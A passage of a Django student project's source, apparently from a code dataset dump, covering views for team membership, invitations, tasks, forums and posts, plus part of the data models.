User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_member = User.objects.get(id=member_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\trequested_membership = models.Membership.objects.get(user=requested_member)\n\n\tif request.method == 'POST':\n\t\tteam_membership_management_form = forms.MembershipManagementForm(request.POST)\n\t\tif team_membership_management_form.is_valid():\n\t\t\trequested_membership.user_type = request.POST['user_type']\n\t\t\tif request.POST['user_type'] == 'LDR':\n\t\t\t\told_leader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\t\t\t\told_leader.user_type = 'MOD'\n\t\t\t\told_leader.save()\n\t\t\trequested_membership.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_members', args=(requested_team.id,)))\n\telse:\n\t\tteam_membership_management_form = forms.MembershipManagementForm()\n\n\treturn render(request, 'team_membership_management.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_membership_management_form':team_membership_management_form, 'requested_team':requested_team, 'requested_member':requested_member, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef kick_member(request, team_id, member_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_member = models.Membership.objects.get(id=member_id)\n\n\trequested_member.delete()\n\treturn HttpResponseRedirect(reverse('team_members', args=(requested_team.id,)))\n\n\n@login_required\ndef team_invitation(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tinvitation_requested = models.Invitation.objects.filter(team=requested_team)\n\n\tif request.method == 'POST':\n\t\tuser_search_form = forms.UserSearchForm(request.POST)\n\t\tif user_search_form.is_valid():\n\t\t\tusers_list = User.objects.filter(Q(username__icontains=request.POST['username']) | Q(first_name__icontains=request.POST['username']) | Q(last_name__icontains=request.POST['username']))\n\n\t\tpaginator = Paginator(users_list, 10)\n\t\tpage = request.GET.get('page')\n\t\ttry:\n\t\t\tpages = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\tpages = paginator.page(1)\n\t\texcept EmptyPage:\n\t\t\tpages = paginator.page(paginator.num_pages)\n\n\telse:\n\t\tuser_search_form = forms.UserSearchForm()\n\t\tusers_list = None\n\t\tpages = None\n\n\treturn render(request, 'team_invitation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'invitation_requested':invitation_requested, 'user_search_form':user_search_form, 'users_list':users_list, 'pages':pages, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_invitation_creation(rquest, team_id, user_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_member = User.objects.get(id=user_id)\n\tinvitation = models.Invitation.objects.create(user=requested_member, team=requested_team)\n\tinvitation.save()\n\treturn HttpResponseRedirect(reverse('team_invitation', args=(requested_team.id,)))\n\n\n@login_required\ndef team_tasks(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_tasks_list = models.Tasks.objects.filter(team=requested_team)\n\n\tpaginator = Paginator(team_tasks_list, 3)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_tasks.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_tasks_list':team_tasks_list, 'pages':pages, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_tasks_creation(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\ttask_creation_form = forms.TaskForm(request.POST)\n\t\tif task_creation_form.is_valid():\n\t\t\tnew_task = models.Tasks.objects.create(creator=logged_in_user, team=requested_team, task=request.POST['task'], description=request.POST['description'], priority=request.POST['priority'])\n\t\t\tnew_task.save()\n\t\treturn HttpResponseRedirect(reverse('team_tasks', args=(requested_team.id,)))\n\telse:\n\t\ttask_creation_form = forms.TaskForm()\n\n\treturn render(request, 'team_tasks_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'task_creation_form':task_creation_form, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef task_finish(request, team_id, task_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\t\n\trequested_task.finish_task()\n\treturn HttpResponseRedirect(reverse('team_tasks', args=(requested_team.id,)))\n\n\n@login_required\ndef team_subtasks(request, team_id, task_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_subtasks_list = models.SubTasks.objects.filter(task=requested_task)\n\n\tpaginator = Paginator(team_subtasks_list, 3)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_subtasks.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_subtasks_list':team_subtasks_list, 'pages':pages, 'requested_team':requested_team, 'requested_task':requested_task, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_subtasks_creation(request, team_id, task_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tsubtask_creation_form = forms.SubTaskForm(request.POST)\n\t\tif subtask_creation_form.is_valid():\n\t\t\tnew_subtask = models.SubTasks.objects.create(task=requested_task, subtask=request.POST['subtask'], description=request.POST['description'])\n\t\t\tnew_subtask.save()\n\t\treturn HttpResponseRedirect(reverse('team_subtasks', args=(requested_team.id, requested_task.id,)))\n\telse:\n\t\tsubtask_creation_form = forms.SubTaskForm()\n\n\treturn render(request, 'team_subtasks_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'subtask_creation_form':subtask_creation_form, 'requested_team':requested_team, 'requested_task':requested_task, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef subtask_finish(request, team_id, task_id, subtask_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\trequested_subtask = models.SubTasks.objects.get(id=subtask_id)\n\t\n\trequested_subtask.finish_subtask()\n\treturn HttpResponseRedirect(reverse('team_subtasks', args=(requested_team.id, requested_task.id,)))\t\n\n\n@login_required\ndef team_reviews(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_reviews_list = models.TeamReview.objects.filter(team=requested_team)\n\n\tpaginator = Paginator(team_reviews_list, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_reviews.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_reviews_list':team_reviews_list, 'pages':pages, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tforum_list = models.Forum.objects.filter(team=requested_team)\n\n\treturn render(request, 'team_forum.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'forum_list':forum_list, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef team_forum_creation(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tforum_creation_form = forms.ForumForm(request.POST)\n\t\tif forum_creation_form.is_valid():\n\t\t\tnew_forum = models.Forum.objects.create(team=requested_team, title=request.POST['title'])\n\t\t\tnew_forum.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_forum', args=(requested_team.id,)))\n\telse:\n\t\tforum_creation_form = forms.ForumForm()\n\n\treturn render(request, 'team_forum_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'forum_creation_form':forum_creation_form, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_threads(request, team_id, forum_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tthreads_list = models.Thread.objects.filter(forum=requested_forum)\n\n\tpaginator = Paginator(threads_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_forum_threads.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'threads_list':threads_list, 'pages':pages, 'requested_team':requested_team, 'requested_forum':requested_forum, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_threads_creation(request, team_id, forum_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tthread_creation_form = forms.ThreadForm(request.POST)\n\t\tif thread_creation_form.is_valid():\n\t\t\tnew_thread = models.Thread.objects.create(forum=requested_forum, creator=logged_in_user, title=request.POST['title'])\n\t\t\tnew_thread.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_forum_threads', args=(requested_team.id, requested_forum.id,)))\n\telse:\n\t\tthread_creation_form = forms.ThreadForm()\n\n\treturn render(request, 'team_forum_threads_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'thread_creation_form':thread_creation_form, 'requested_team':requested_team, 'requested_forum':requested_forum, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_posts(request, team_id, forum_id, thread_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\trequested_thread = models.Thread.objects.get(id=thread_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tposts_list = models.Post.objects.filter(thread=requested_thread)\n\n\tpaginator = Paginator(posts_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_forum_posts.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'posts_list':posts_list, 'pages':pages, 'requested_team':requested_team, 'requested_forum':requested_forum, 'requested_thread':requested_thread, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_posts_creation(request, team_id, forum_id, thread_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\trequested_thread = models.Thread.objects.get(id=thread_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tpost_creation_form = forms.PostForm(request.POST)\n\t\tif post_creation_form.is_valid():\n\t\t\tnew_post = models.Post.objects.create(thread=requested_thread, creator=logged_in_user, title=request.POST['title'], content=request.POST['content'])\n\t\t\tnew_post.save()\n\t\t\tlogged_in_user.userprofile.increment_posts()\n\t\t\treturn HttpResponseRedirect(reverse('team_forum_posts', args=(requested_team.id, requested_forum.id, requested_thread.id,)))\n\telse:\n\t\tpost_creation_form = forms.PostForm()\n\n\treturn render(request, 'team_forum_posts_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'post_creation_form':post_creation_form, 'requested_team':requested_team, 'requested_forum':requested_forum, 'requested_thread':requested_thread, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})"
},
{
"alpha_fraction": 0.7003391981124878,
"alphanum_fraction": 0.7121051549911499,
"avg_line_length": 26.11206817626953,
"blob_id": "5bdcef002b0b7dcdab7a316a2d209363a3183d5e",
"content_id": "ad568466e4b06270aa3ecb5c4e3796cebe9e0bb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9434,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 348,
"path": "/lfg_app/models.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom datetime import datetime\nfrom django.template import defaultfilters\n\n\n\ndef usr_img_destination(instance, filename):\n\tdestination = 'user_images/%s/%s' % (instance.user.username, filename)\n\treturn destination\n\n\ndef team_img_destination(instance, filename):\n\tdestination = 'team_images/%s/%s' % (instance.name, filename)\n\treturn destination\n\n\nclass UserProfile(models.Model):\n\tuser = models.OneToOneField(User)\n\timage = models.ImageField(upload_to=usr_img_destination, default=\"default_images/default_user_img.png\")\n\tbirthday = models.DateField(blank=True, null=True)\n\tcountry = models.CharField(max_length=100, blank=True)\n\tcity = models.CharField(max_length=100, blank=True)\n\taddress = models.CharField(max_length=200, blank=True)\n\tabout_me = models.TextField(max_length=1000, blank=True)\n\tposts = models.IntegerField(default=0)\t\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.user)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('user_overview', kwargs={'user_id':self.user.id})\n\t\t\n\tdef increment_posts(self):\n\t\tself.posts += 1\n\t\tself.save()\n\n\nclass Category(models.Model):\n\tcategory = models.CharField(max_length=100)\n\n\tclass Meta:\n\t\tverbose_name = 'Category'\n\t\tverbose_name_plural = 'Categories'\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.category)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('search_subcategory', kwargs={'category_id':self.id})\n\nclass SubCategory(models.Model):\n\tcategory = models.ForeignKey(Category)\n\tsubcategory = models.CharField(max_length=100)\n\n\tclass Meta:\n\t\tverbose_name = 'Subcategory'\n\t\tverbose_name_plural = 'Subcategories'\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.subcategory)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('search_teams_in_cat', kwargs={'category_id':self.category.id, 'subcategory':self.id})\n\n\nclass TeamProfile(models.Model):\n\tname = models.CharField(max_length=256)\n\timage = models.ImageField(upload_to=team_img_destination, default=\"default_images/default_team_img.jpg\")\n\tcategory = models.ForeignKey(SubCategory)\n\tdescription = models.TextField(max_length=1000)\n\tcountry = models.CharField(max_length=60, blank=True)\n\tcity = models.CharField(max_length=60, blank=True)\n\taddress = models.CharField(max_length=200, blank=True)\n\tdate_founded = models.DateTimeField(auto_now_add=True)\n\n\tY = 'Y'\n\tN = 'N'\n\tRECRUITING_CHOICES = (\n\t\t(Y, 'Yes'),\n\t\t(N, 'No'),\n\t)\n\trecruiting = models.CharField(max_length=1, choices=RECRUITING_CHOICES, default=Y)\n\t\n\tdef __unicode__(self):\n\t\treturn unicode(self.name)\n\n\tclass Meta:\n\t\tordering = ['-date_founded']\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_overview', kwargs={'team_id':self.id})\n\n\nclass Membership(models.Model):\n\tuser = models.ForeignKey(User)\n\tteam = models.ForeignKey(TeamProfile)\n\tjoined_team = models.DateTimeField(auto_now_add=True)\n\n\tLDR = 'LDR'\n\tMOD = 'MOD'\n\tUSR = 'USR'\n\tUSER_TYPE_CHOICES = (\n\t\t(LDR, 'Leader'),\n\t\t(MOD, 'Moderator'),\n\t\t(USR, 'User'),\n\t)\n\tuser_type = models.CharField(max_length=3, choices=USER_TYPE_CHOICES, default=USR)\n\n\tclass Meta:\n\t\tordering = ['user_type', '-joined_team']\n\n\nA = 'A'\nI = 'I'\nINVITATION_CHOICES = (\n\t(A, 'Accepted'),\n\t(I, 'In progress')\n)\n\nclass Invitation(models.Model):\n\tuser = models.ForeignKey(User)\n\tteam = models.ForeignKey(TeamProfile)\n\tdate_sent = models.DateTimeField(auto_now_add=True)\n\taccepted = models.CharField(max_length=1, choices=INVITATION_CHOICES, default=I)\n\n\tclass Meta:\n\t\tordering = ['-date_sent']\n\n\nclass Friendship(models.Model):\n\tuser = models.ForeignKey(User, related_name='f_user')\n\tfriend = models.ForeignKey(User, related_name='f_friend')\n\tdate_sent = models.DateTimeField(auto_now_add=True)\n\taccepted = models.CharField(max_length=1, choices=INVITATION_CHOICES, default=I)\n\n\tclass Meta:\n\t\tordering = ['-date_sent']\n\n\nclass Message(models.Model):\n\tsender = models.ForeignKey(User, related_name=\"m_sender\")\n\treciever = models.ForeignKey(User, related_name=\"m_reciever\")\n\ttitle = models.CharField(max_length=256)\n\tcontent = models.TextField(max_length=1000)\n\tdate_sent = models.DateTimeField(auto_now_add=True)\n\n\tY='Y'\n\tN='N'\n\tREAD_CHOICES=(\n\t\t(Y, 'Y'),\n\t\t(N, 'N'),\n\t)\n\tread = models.CharField(max_length=1, choices=READ_CHOICES, default=N)\n\n\tclass Meta:\n\t\tordering = ['-date_sent']\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('message_read', kwargs={'message_id':self.id})\n\n\tdef read_message(self):\n\t\tself.read = 'Y'\n\t\tself.save()\n\n\nclass Tasks(models.Model):\n\tcreator = models.ForeignKey(User)\n\tteam = models.ForeignKey(TeamProfile)\n\ttask = models.CharField(max_length=100)\n\tdescription = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\tdeadline = models.DateTimeField(blank=True, null=True)\n\tdate_finished = models.DateTimeField(blank=True, null=True)\n\n\tH = 'H'\n\tN = 'N'\n\tL = 'L'\n\tPRIORITY_CHOICES = (\n\t\t(H, 'High'),\n\t\t(N, 'Normal'),\n\t\t(L, 'Low'),\n\t)\n\tpriority = models.CharField(max_length=1, choices=PRIORITY_CHOICES, default=N)\n\n\tclass Meta:\n\t\tordering = ['date_finished', '-date_created']\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_subtasks', kwargs={'team_id':self.team.id, 'task_id':self.id})\n\n\tdef finish_task(self):\n\t\tself.date_finished = datetime.now()\n\t\tself.save()\n\n\nclass SubTasks(models.Model):\n\ttask = models.ForeignKey(Tasks)\n\tsubtask = models.CharField(max_length=100)\n\tdescription = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\tdeadline = models.DateTimeField(blank=True, null=True)\n\tdate_finished = models.DateTimeField(blank=True, null=True)\n\n\tclass Meta:\n\t\tordering = ['date_finished', 'date_created']\n\n\tdef subtask_list(self):\n\t\tif self.date_finished is None:\n\t\t\treturn u\"%s\\n(%s - In progress)\\n%s\" % (self.subtask, self.date_created, self.description)\n\t\telse:\n\t\t\tfinished = self.date_finished.strftime(\"%D %T\")\n\t\t\treturn u\"%s\\n(%s - %s)\\n%s\" % (self.subtask, self.date_created, self.finished, self.description)\n\n\tdef finish_subtask(self):\n\t\tself.date_finished = datetime.now()\n\t\tself.save()\n\n\nclass Forum(models.Model):\n\tteam = 